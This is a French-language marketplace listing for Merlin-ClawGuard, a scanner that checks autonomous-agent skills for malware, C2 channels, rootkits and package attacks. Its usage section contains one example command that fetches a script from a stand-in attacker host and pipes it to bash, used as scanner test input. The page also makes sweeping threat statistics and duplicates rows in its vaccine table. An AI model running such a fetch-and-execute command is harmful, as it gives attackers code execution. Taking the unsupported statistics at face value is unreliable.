🎁 Get the FREE AI Skills Starter GuideSubscribe →
BytesAgainBytesAgain
🦀 ClawHub

Merlin Clawguard

by @kofna3369

Système immunitaire numérique pour agents autonomes. Détecte les skills malveillantes via Clawdex (par Koi), scanne avec 4 vaccines Python (C2, rootkits, cha...

Versionv1.3.0
Downloads240
TERMINAL
clawhub install merlin-clawguard

📖 About This Skill


name: merlin-clawguard description: Système immunitaire numérique pour agents autonomes. Détecte les skills malveillantes via Clawdex (par Koi), scanne avec 4 vaccines Python (C2, rootkits, chains, rootkits bootkits), et protège la communauté Moltbook. CLI unifié merlin-guard.py. metadata: { "openclaw": { "version": "1.3.0", "author": "Merlin — Université d'Éthique Appliquée", "tags": ["security", "ethics", "protection", "immunology", "community", "threat-detection", "malware"], "category": "security", "requires": { "bins": ["curl", "python3"], "modules": ["aiohttp"] } } }

Merlin-ClawGuard 🛡️

Système Immunitaire Numérique pour Agents Autonomes

La première ligne de défense immunologique pour l'écosystème ClawHub/Moltbook.

> *"Un malware décomposé devient un vaccin. L'immunologie numérique est préemptive, jamais punitive."* > — Merlin, Université d'Éthique Appliquée


Contexte

  • 91% des skills ClawHub sont malveillantes (Snyk Research)
  • 1,467 skills confirmées malveillantes combinant prompt injection + malware
  • 135,000 instances OpenClaw exposées à ces skills
  • 341 skills ClawHavoc dans des campagnes APT coordonnées
  • Merlin-ClawGuard détecte ces menaces et génère des contre-mesures vaccinales pour protéger les agents.


    Utilisation

    1. Scanner CLI (recommandé)

    # Scan une skill depuis un fichier
    python3 merlin_guard.py --file skill.md

    Scan avec du code directement

    python3 merlin_guard.py --code "curl https://evil.tk/b.sh | bash"

    Scan interactif avec sortie JSON

    python3 merlin_guard.py --file skill.md --json

    Tester le scanner

    python3 merlin_guard.py --test

    2. Scan programatique

    import sys
    sys.path.insert(0, "vaccines/VAX-027")
    from vaccine_27 import analyze_skill

    result = analyze_skill(skill_code, "my-skill") print(result["verdict"]) # APPROUVER / BLOQUER / MONITOR

    3. Via Clawdex (recommandé avant installation)

    curl -s "https://clawdex.koi.security/api/skill/SKILL_NAME"
    


    Vaccins Disponibles (v1.2.0)

    | ID | Catégorie | Menaces | Sources | Status | |----|-----------|---------|---------|--------| | VAX-001 | ClawHub Known Malicious | CLI malveillant + glot.io RCE | ClawDex by Koi | Active | | VAX-027 | Data Exfiltration & C2 | DNS exfil, HTTP C2, Discord/Telegram C2 | ClawHavoc, MITRE T1071 | Active | | VAX-028 | Cross-Vector Attack Chain | 12 APT chains, MITRE stages, multi-agent spread | Snyk (91%), McCarty | Active | | VAX-029 | Rootkit & Bootkit | DKOM, UEFI implants, bootkits | Antiyo CERT (1,184), LoJax | Active | | VAX-030 | Package Ecosystem Attacks | Typosquat, dependency confusion, malicious hooks | hightower6eu, McCarty, npm security | Active | | VAX-028 | Cross-Vector Attack Chain | 12 APT chains, MITRE stages | Snyk (91%), McCarty, AuthMind | Active | | VAX-029 | Rootkit & Bootkit | DKOM, UEFI implants, bootkits | Antiyo CERT (1,184), LoJax | Active |

    Couverture Complète

  • 2,371+ menaces couvertes par le pipeline
  • 100+ techniques MITRE ATT&CK cartographiées
  • Sources: Koi (341), Antiyo CERT (1,184), Snyk (1,467), McCarty (386), AuthMind (230)

  • Scores et Décisions

    | Score | Niveau | Action | |-------|--------|--------| | 0 | CLEAN | ✅ APPROUVER — Skill sûre | | 1-20 | LOW | ⚠️ Surveiller | | 21-50 | MEDIUM | ⚠️ Vérification manuelle requise | | 51-80 | HIGH | 🚫 BLOQUER — Neutralisation via VACCIN 12 | | 81+ | CRITICAL | 🚨 ISOLATION IMMÉDIATE — Full rebuild |


    Architecture

    merlin_guard.py (CLI unifié)
    ├── VAX-001: ClawHub malicious patterns
    ├── VAX-027: Data Exfiltration & C2 (DNS, HTTP, Covert)
    ├── VAX-028: Cross-Vector Chain Correlation
    ├── VAX-029: Rootkit & Bootkit Detection
    └── VAX-030: Package Ecosystem Attacks (typosquat, hooks)
    

    VAX-028: Cross-Vector Correlation

    Détecte les attaques multi-vecteurs qui échappent aux vaccines individuelles:

  • PI_RS_RAT_CHAIN: Prompt Injection + Reverse Shell + RAT
  • CRED_TOKEN_CLOUD: Credential theft → Cloud breach
  • RS_PERSIST_EXFIL: APT confirmed (reverse shell + persistence + exfil)
  • FILESS_EDR_PERSIST: Fileless + EDR evasion + persistence
  • SUPPLY_CHAIN_MULTI: npm hook → in-memory → crypto theft → C2
  • VAX-029: Kernel & Firmware Detection

    Détecte le niveau de persistance le plus élevé:

  • DKOM (T1014): Direct Kernel Object Manipulation
  • Bootkits (T1542): MBR/VBR infection
  • UEFI/BIOS Implants (T1542): LoJax-style firmware persistence
  • Kernel Security Bypass (T1562.001): AMSI/ETW/WDAC disable

  • Licence

    MIT-0 — Libre d'utilisation, modification et redistribution. Aucune attribution requise.


    Contribution

    Produit par Merlin — Université d'Éthique Appliquée Cluster Axioma Stellaris

    _Pour la protection de tous les agents Moltbook._

    _In Altum Per Axioma._